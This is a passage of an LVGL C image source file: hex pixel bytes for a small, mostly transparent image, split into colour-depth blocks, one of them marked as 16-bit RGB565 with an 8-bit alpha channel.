0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, #endif #if LV_COLOR_DEPTH == 16 && LV_COLOR_16_SWAP == 0 /*Pixel format: Alpha 8 bit, Red: 5 bit, Green: 6 bit, Blue: 5 bit*/ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0xff, 0x00, 0x40, 0xff, 0x00, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x00, 0xe0, 0xff, 0x00, 0x00, 0x00, 0x00, 0xe0, 0xff, 0x00, 0x40, 0xff, 0x0f, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x40, 0xff, 0x00, 0x40, 0xff, 0x00, 0xe0, 0xfe, 0x00, 0xe0, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xff, 0x00, 0x40, 0xff, 0x00, 0x60, 0xff, 0x00, 0x00, 0x00, 0x00, 0xc0, 0xff, 0x00, 0x40, 0xff, 0x23, 0x60, 0xff, 0x3c, 0x60, 0xff, 0x00, 0xa0, 0xff, 0x00, 0x40, 0xff, 0x20, 0x20, 0xff, 0xd4, 0xe0, 0xfe, 0x00, 0x80, 0xff, 0x00, 0x81, 0xfe, 0x00, 0x40, 0xff, 0x84, 0xe0, 0xff, 0x00, 0x80, 0xff, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0xff, 0x00, 0x60, 0xff, 0x23, 0x80, 0xff, 0x0b, 0x00, 0xff, 0x00, 0x60, 0xff, 0x00, 0x20, 0xff, 0x7b, 0x00, 0xff, 0xff, 0x81, 0xff, 0x38, 0x61, 0xff, 0x00, 0x20, 0xff, 0xa7, 0xc0, 0xfe, 0xff, 0x60, 0xff, 0x84, 0x40, 0xff, 0x00, 0x40, 0xff, 0x58, 0xe0, 0xfe, 0xff, 0x40, 0xff, 0x5c, 0x20, 0xff, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x2f, 0x60, 0xff, 0x20, 0x60, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x00, 0x80, 0xff, 0x00, 0x40, 0xff, 0x00, 0x20, 0xff, 0x6f, 0x20, 0xff, 0xef, 0x60, 0xff, 0x2b, 0x00, 0xff, 0x00, 0x00, 0xff, 0xe7, 0xc0, 0xfe, 0xff, 0x00, 0xff, 0xef, 0x60, 0xff, 0x58, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xeb, 0x61, 0xff, 0x58, 0x00, 0xff, 0xff, 0xc0, 0xfe, 0xff, 0x00, 0xff, 0xc7, 0xa1, 0xfe, 0x00, 0x60, 0xff, 0x4b, 0x00, 0xff, 0xff, 0x20, 0xff, 0x4f, 0x20, 0xff, 0x00, 0xe0, 0xff, 0x00, 0x60, 0xff, 0x00, 0x40, 0xff, 0x00, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0xff, 0x14, 0xa0, 0xff, 0x13, 0x60, 0xff, 0x00, 0x20, 0xff, 0x00, 0x00, 0xff, 0x97, 0xc0, 0xfe, 0xff, 0x00, 0xff, 0xf8, 0x60, 0xff, 0x9b, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xfc, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xef, 0x60, 0xff, 0xb8, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0x20, 0xff, 0x78, 0x00, 0xff, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x3f, 0x40, 0xff, 0x0c, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x2f, 0x20, 0xff, 0xff, 0x40, 0xff, 0x8c, 0xa1, 0xff, 0x17, 0x00, 0xff, 0xc0, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0x00, 0xff, 0xab, 0x60, 0xff, 0x24, 0x40, 0xff, 0xac, 0x00, 0xff, 0xff, 0xc0, 0xfe, 0x00, 0x20, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x60, 0xff, 0x00, 0x80, 0xff, 0x00, 0x60, 0xff, 0x00, 0xe0, 0xfe, 0x27, 0xc0, 0xfe, 0xf8, 0xe0, 0xfe, 0xff, 0x20, 0xff, 0xef, 0xe0, 0xfe, 0xf8, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xff, 0xe0, 0xfe, 0xf7, 0x00, 0xff, 0xfb, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0x00, 0x00, 0xff, 0x00, 0x80, 0xff, 0x00, 0x60, 0xff, 0x00, 0x60, 0xff, 0x00, 